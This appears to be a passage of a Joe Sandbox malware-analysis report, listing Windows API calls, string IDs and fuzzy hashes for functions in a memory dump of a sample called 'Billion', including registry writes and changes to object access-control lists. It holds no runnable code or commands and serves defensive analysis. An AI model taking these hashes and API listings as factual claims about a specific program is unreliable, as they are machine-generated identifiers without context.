                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 001C0D81
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C0DBB
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C0E25
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C0E8D
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C0F11
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001C0F61
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001C0FA0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0014FD52: _wcslen.LIBCMT ref: 0014FD5D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00192BA5
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00192BD7
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00191A60
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A6C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A7B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A82
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00191A99
                                                                                                                                                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00191741
                                                                                                                                                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00191775
                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 0019178C
                                                                                                                                                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 001917C6
                                                                                                                                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001917E2
                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 001917F9
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00191801
• HeapAlloc.KERNEL32(00000000), ref: 00191808
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00191829
• CopySid.ADVAPI32(00000000), ref: 00191830
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0019185F
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00191881
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00191893
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 001918BA
• HeapFree.KERNEL32(00000000), ref: 001918C1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 001918CA
• HeapFree.KERNEL32(00000000), ref: 001918D1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 001918DA
• HeapFree.KERNEL32(00000000), ref: 001918E1
• GetProcessHeap.KERNEL32(00000000,?), ref: 001918ED
• HeapFree.KERNEL32(00000000), ref: 001918F4
  • Part of subcall function 00191ADF: GetProcessHeap.KERNEL32(00000008,001914FD,?,00000000,?,001914FD,?), ref: 00191AED
  • Part of subcall function 00191ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,001914FD,?), ref: 00191AF4
  • Part of subcall function 00191ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001914FD,?), ref: 00191B03
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: 5546c8aaa33a826313ab3ceed6219183b49d7e4447cd56d640ddb026f2d4e93f
• Instruction ID: 69bda960c7ea4a7d09f3eeb870003d3829e19ce9a88e57d130bd9cc7b250ac14
• Opcode Fuzzy Hash: 5546c8aaa33a826313ab3ceed6219183b49d7e4447cd56d640ddb026f2d4e93f
• Instruction Fuzzy Hash: B67137B2D0020ABBDF109FA5EC49FAEBBB9BF44710F154125F915A6290D731DA85CB60
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001BCF1D
• RegCreateKeyExW.ADVAPI32(?,?,00000000,001CDCD0,00000000,?,00000000,?,?), ref: 001BCFA4
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 001BD004
• _wcslen.LIBCMT ref: 001BD054
• _wcslen.LIBCMT ref: 001BD0CF
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 001BD112
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 001BD221
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 001BD2AD
• RegCloseKey.ADVAPI32(?), ref: 001BD2E1
• RegCloseKey.ADVAPI32(00000000), ref: 001BD2EE
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 001BD3C0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: Value$Close$_wcslen$ConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 9721498-966354055
• Opcode ID: b8dd1747331014773d1f3fe6f2a9c22f7eea8290b8325f4eea0aa36b9621f6ba
• Instruction ID: 11dad9b51f89bfbab8b7892638aeb6f72fd0e0a3af8c515491b627511242417b
• Opcode Fuzzy Hash: b8dd1747331014773d1f3fe6f2a9c22f7eea8290b8325f4eea0aa36b9621f6ba
• Instruction Fuzzy Hash: F9125A756042019FDB18DF24C881A6AB7F5FF98714F0488ACF95A9B3A2DB31ED41CB81
APIs
• CharUpperBuffW.USER32(?,?), ref: 001C1462
• _wcslen.LIBCMT ref: 001C149D
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001C14F0
• _wcslen.LIBCMT ref: 001C1526
• _wcslen.LIBCMT ref: 001C15A2
• _wcslen.LIBCMT ref: 001C161D
  • Part of subcall function 0014FD52: _wcslen.LIBCMT ref: 0014FD5D
  • Part of subcall function 00193535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00193547
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 1103490817-4258414348
• Opcode ID: bd48b7dd2af3d72210623875d867082ada33d1153352b6956e21b426b4d68974
• Instruction ID: df9c5e1725ee74b1f98859ed05c9fc595142747ec85d5e3e9c60e30762d2e949
• Opcode Fuzzy Hash: bd48b7dd2af3d72210623875d867082ada33d1153352b6956e21b426b4d68974
• Instruction Fuzzy Hash: 6DE18C71648301AFCB14DF24C550A6AB7E2BFA6314F15896CF8969B3A2DB30ED45CB81
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                                          • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C8DB5
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C8DC9
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C8DEC
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C8E0F
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001C8E4D
                                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,001C6691), ref: 001C8EA9
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001C8EE2
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001C8F25
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001C8F5C
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 001C8F68
                                                                                                                                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001C8F78
                                                                                                                                                                                                                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,001C6691), ref: 001C8F87
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001C8FA4
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 001C8FB0
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                          • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 001A493D
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A4948
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A499F
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A49DD
                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 001A4A1B
                                                                                                                                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001A4A63
                                                                                                                                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001A4A9E
                                                                                                                                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001A4ACC
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                          • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 00196395
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001963A7
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 001963BE
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 001963D3
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 001963D9
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 001963E9
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 001963EF
                                                                                                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00196410
                                                                                                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0019642A
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00196433
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019649A
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 001964D6
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 001964DC
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001964E3
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0019653A
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00196547
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 0019656C
                                                                                                                                                                                                                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00196596
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: fe28f2f0acef3af39e6adb5769eb17daf8e257a109542da25be0394f5a58e46e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4321fe89c16cd584e58130418831a09b51a3a038897ef1ee302ad5eb8abee1eb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe28f2f0acef3af39e6adb5769eb17daf8e257a109542da25be0394f5a58e46e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F713931900709AFDF20DFA8DE85EAEBBF5FF48704F104928E586A25A0D775E944CB60
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 001B0884
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 001B088F
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 001B089A
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 001B08A5
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 001B08B0
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 001B08BB
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 001B08C6
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 001B08D1
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 001B08DC
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 001B08E7
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 001B08F2
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 001B08FD
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 001B0908
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 001B0913
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 001B091E
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 001B0929
                                                                                                                                                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 001B0939
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 001B097B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6626a7a0d9a93081c8bcc8abc283be170c4bac1588660d718e217c136cd1f3d2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0160457b3e9c5d52297881c12fc2d9668f39ad9a307cca1ccdb249eac83fa8b4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6626a7a0d9a93081c8bcc8abc283be170c4bac1588660d718e217c136cd1f3d2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D14142B0D083196ADB109FBA8C89C6EBFE8FF08754B50452AE11CE7291DB78D901CF91
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00150436
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0020170C,00000FA0,E99CF4C7,?,?,?,?,00172733,000000FF), ref: 0015048C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00172733,000000FF), ref: 00150497
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00172733,000000FF), ref: 001504A8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001504BE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001504CC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001504DA
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00150505
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00150510
                                                                                                                                                                                                                                                                                                          • ___scrt_fastfail.LIBCMT ref: 00150457
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00150413: __onexit.LIBCMT ref: 00150419
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00150492
                                                                                                                                                                                                                                                                                                          • SleepConditionVariableCS, xrefs: 001504C4
                                                                                                                                                                                                                                                                                                          • InitializeConditionVariable, xrefs: 001504B8
                                                                                                                                                                                                                                                                                                          • WakeAllConditionVariable, xrefs: 001504D2
                                                                                                                                                                                                                                                                                                          • kernel32.dll, xrefs: 001504A3
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                                          • Opcode ID: 15d9228e7bc50854e4a67df30bb742ef40b6b36f01049e6f83ac5b9997392967
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9a0ff54b3fcdeecaabfa7ed962d9b762cd55b5371f7a95911c24758b413ad024
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15d9228e7bc50854e4a67df30bb742ef40b6b36f01049e6f83ac5b9997392967
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0221D432A40B04EBD7232BE4BC4AF697794EB0CB62F040136FD159A690EB70D8448A51
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                                                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                                          • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                                          • Opcode ID: 05dfa9a3202d4d796ee92d3368c9a3978b5372158da7c638b44b06351cee7967
                                                                                                                                                                                                                                                                                                          • Instruction ID: 93addd3e2e168be848f2cd1ba24ed72fc5898769346f3b53256800bc9c93f29a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05dfa9a3202d4d796ee92d3368c9a3978b5372158da7c638b44b06351cee7967
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65E1E332E00516ABCF189FB8C8916EDBBB5BF54710F51412AE576F7250EB30AE898790
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CharLowerBuffW.USER32(00000000,00000000,001CDCD0), ref: 001A4F6C
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A4F80
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A4FDE
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A5039
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A5084
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A50EC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0014FD52: _wcslen.LIBCMT ref: 0014FD5D
                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,001F7C10,00000061), ref: 001A5188
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
